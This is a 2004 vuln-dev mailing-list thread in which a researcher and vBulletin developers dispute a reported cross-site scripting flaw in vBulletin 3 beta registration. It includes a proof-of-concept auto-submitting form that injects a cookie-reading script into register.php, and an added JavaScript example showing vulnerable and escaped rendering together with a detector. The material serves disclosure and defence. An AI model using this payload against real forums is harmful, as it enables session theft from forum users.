The previous exploit affects vB3 Beta 2 through Beta 7.
To patch against this exploit, please update to vB3 Gamma or later.
Ferruh.Mavituna
http://feruh.mavituna.com
PGPKey : http://ferruh.mavituna.com/PGPKey.asc
-----Original Message-----
From: Ferruh Mavituna [mailto:ferruh (at) mavituna (dot) com [email concealed]]
Sent: Friday, January 23, 2004 11:35 PM
To: 'vuln-dev (at) securityfocus (dot) com [email concealed]'; 'Kier Darby'
Subject: RE: vBulletin Security Vulnerability - POC
I'm sending the proof of concept again [ http://ferruh.mavituna.com/article/?256
- 06.08.2003 ];
Test this code in forums which use "vBulletin v3.0.0 Beta 7". Most of
them are vulnerable. I discovered this in "Beta 2" about 3 months ago.
---------------------------------------------------------------
PROOF OF CONCEPT;
---------------------------------------------------------------
<form action="http://[VICTIM - FORUM PATH]/register.php?do=register"
      method="post" style="display:none">
  <input type="hidden" name="s" value="" />
  <!-- regtype=1 selects the "Standard" registration form -->
  <input type="hidden" name="regtype" value="1" />
  <!-- field1 carries the payload; its value is filled in by the script below -->
  <input type="text" class="bginput" name="field1" value="" size="25"
         maxlength="250" />
  <input type="hidden" name="url" value="index.php" />
  <input type="hidden" name="do" value="addmember" />
</form>
<script>
// Code that will be executed: close the value="" attribute and the tag,
// then inject a script element ("document"+".cookie" is split to dodge naive filters)
var xss = "\"><script>alert(document"+".cookie)<\/script>";
// document.forms[0] works in every browser; the original forms(0) call is IE-only
document.forms[0].field1.value = xss;
document.forms[0].submit();
</script>
---------------------------------------------------------------
---------------------------------------------------------------
Current vulnerable versions;
---------------------------------------------------------------
vBulletin 3.0 Beta 2 <-> Beta 7
(if the standard / quick registration option is present)
Ferruh.Mavituna
http://feruh.mavituna.com
PGPKey : http://ferruh.mavituna.com/PGPKey.asc
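As an added illustration, not code from vBulletin or from anyone in this thread, the following JavaScript models the attribute-context reflection that the proof of concept above depends on: a registration template that writes the submitted field1 value back into <input value="..."> unescaped, beside the same template with attribute escaping, and a small check that tells the two apart on the POC payload. The names renderVulnerable, renderHardened, escapeHtml, hasScriptTagOutsideAttributes and compare are hypothetical; nothing here is taken from vBulletin's register.php or its templates.

```javascript
// Added example, not vBulletin code. renderVulnerable()/renderHardened() are
// hypothetical stand-ins for a registration template that echoes the submitted
// "field1" value back into <input value="...">.

// The payload from the proof of concept: close the value attribute, close the
// <input> tag, then inject a script element.
const POC_PAYLOAD = '"><script>alert(document.cookie)</script>';

// Escape for HTML attribute and text context (what PHP's
// htmlspecialchars($s, ENT_QUOTES) does). Ampersand must be replaced first.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Vulnerable rendering: the submitted value is interpolated verbatim into a
// double-quoted attribute, so a leading "> ends the attribute and the tag.
function renderVulnerable(field1) {
  return '<input type="text" name="field1" value="' + field1 +
         '" size="25" maxlength="250" />';
}

// Hardened rendering: the same template with the value escaped for attribute context.
function renderHardened(field1) {
  return '<input type="text" name="field1" value="' + escapeHtml(field1) +
         '" size="25" maxlength="250" />';
}

// Check whether the rendered markup contains a <script start tag in markup
// position, i.e. outside a double-quoted attribute value. This is a deliberately
// small state machine, sufficient for the single <input> above; audit real
// templates with an HTML parser instead.
function hasScriptTagOutsideAttributes(html) {
  let inTag = false;
  let inQuote = false;
  for (let i = 0; i < html.length; i++) {
    const c = html[i];
    if (inTag) {
      if (c === '"') inQuote = !inQuote;
      else if (c === '>' && !inQuote) inTag = false;
    } else if (c === '<') {
      if (html.slice(i, i + 7).toLowerCase() === '<script') return true;
      inTag = true;
    }
  }
  return false;
}

// Summarise both renderings for one submitted value.
function compare(field1) {
  return {
    vulnerable: hasScriptTagOutsideAttributes(renderVulnerable(field1)),
    hardened: hasScriptTagOutsideAttributes(renderHardened(field1)),
  };
}

console.log(renderVulnerable(POC_PAYLOAD));
console.log(renderHardened(POC_PAYLOAD));
console.log(compare(POC_PAYLOAD)); // { vulnerable: true, hardened: false }
```

Run it with node. The check is deliberately narrow (it only tracks double-quoted attribute state), which is enough for the single input element the POC targets; for auditing real templates, parse the output with an HTML parser rather than extending this scanner.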
-----Original Message-----
From: Scott MacVicar [mailto:scott (at) vbulletin (dot) com [email concealed]]
Sent: Friday, January 23, 2004 8:10 PM
To: ferruh (at) mavituna (dot) com [email concealed]
Cc: kier (at) vbulletin (dot) com [email concealed]; vuln-dev (at) securityfocus (dot) com [email concealed]
Subject: RE: vBulletin Security Vulnerability
Hello,
The issue you are now reporting is for a completely different version, and
it's not even the same problem. vBulletin 3 and vBulletin 2 are different
code bases, and again the issue that you are trying to identify is not
present.
----------------------------
[root@devbox vb3b7]# grep -rna "regtype" *
install/vbulletin-style.xml:6866:<input type="hidden" name="regtype"
value="1" />
install/vbulletin-style.xml:7728: <input type="hidden" name="regtype"
value="2" />
install/vbulletin-style.xml:12018: <label for="rb_regtype_1"><input
type="radio" name="regtype" value="1" id="rb_regtype_1" checked="checked"
/><b>Standard</b> - Normal, full length registration form.</label><br />
install/vbulletin-style.xml:12019: <label for="rb_regtype_2"><input
type="radio" name="regtype" value="2" id="rb_regtype_2" /><b>Quick</b> -
Shorter, but less option-filled registration form.</label><br />
install/vbulletin-style.xml:12094: <label for="rb_regtype_1"><input
type="radio" name="regtype" value="1" id="rb_regtype_1" checked="checked"
/><b>Standard</b> - Normal, full length registration form.</label><br />
install/vbulletin-style.xml:12095: <label for="rb_regtype_2"><input
type="radio" name="regtype" value="2" id="rb_regtype_2" /><b>Quick</b> -
Shorter, but less option-filled registration form.</label>
register.php:1302: if ($_REQUEST['regtype'] == 2)
----------------------------
As you can see above, the only time the variable regtype is referenced is
within the register.php code, and it's a comparison and not directly
output. The regtype was removed after Beta 7 for a new registration
method.
----------------------
Scott MacVicar
Developer, vBulletin
> -----Original Message-----
> From: Ferruh Mavituna [mailto:ferruh (at) mavituna (dot) com [email concealed]]
> Sent: 23 January 2004 05:07
> To: 'Kier Darby'; vuln-dev (at) securityfocus (dot) com [email concealed]
> Subject: RE: vBulletin Security Vulnerability
>
> Hello;
>
> This must be an option or something like that in the new vBulletin. After
> a small search on Google you can find all the "vBulletin v3.0.0 Beta 7"
> forums.
>
> --------------------------------------------------------------
> -------------
> "We can only assume that this vulnerability was found in a site
> running code modified from that supplied by Jelsoft."
> --------------------------------------------------------------
> -------------
>
> Not "a site", most of them are vulnerable. If you provide this
> customization, yes, vBulletin is not vulnerable, but the "Jelsoft
> customizations" are vulnerable.
>
> And most of these forums have a register.php "Standard / Quick"
> selection and a "regtype" hidden field.
>
> Almost 80% of your customers are vulnerable.
>
>
> Ferruh.Mavituna
> http://feruh.mavituna.com
> PGPKey : http://ferruh.mavituna.com/PGPKey.asc
>
> -----Original Message-----
> From: Kier Darby [mailto:kier (at) vbulletin (dot) com [email concealed]]
> Sent: Wednesday, January 21, 2004 10:36 PM
> To: vuln-dev (at) securityfocus (dot) com [email concealed]
> Subject: Re: vBulletin Security Vulnerability
>
> In-Reply-To: <20040120190824.GA4674 (at) natalya.rebby (dot) com [email concealed]>
>
> No patch has been issued for this 'vulnerability' because no
> vulnerability exists.
>
> There is no hidden field called "reg_site", nor any $reg_site variable
> anywhere in the vBulletin 2 or vBulletin 3 source code or templates,
> nor has it ever existed.
>
> We can only assume that this vulnerability was found in a site running
> code modified from that supplied by Jelsoft.
>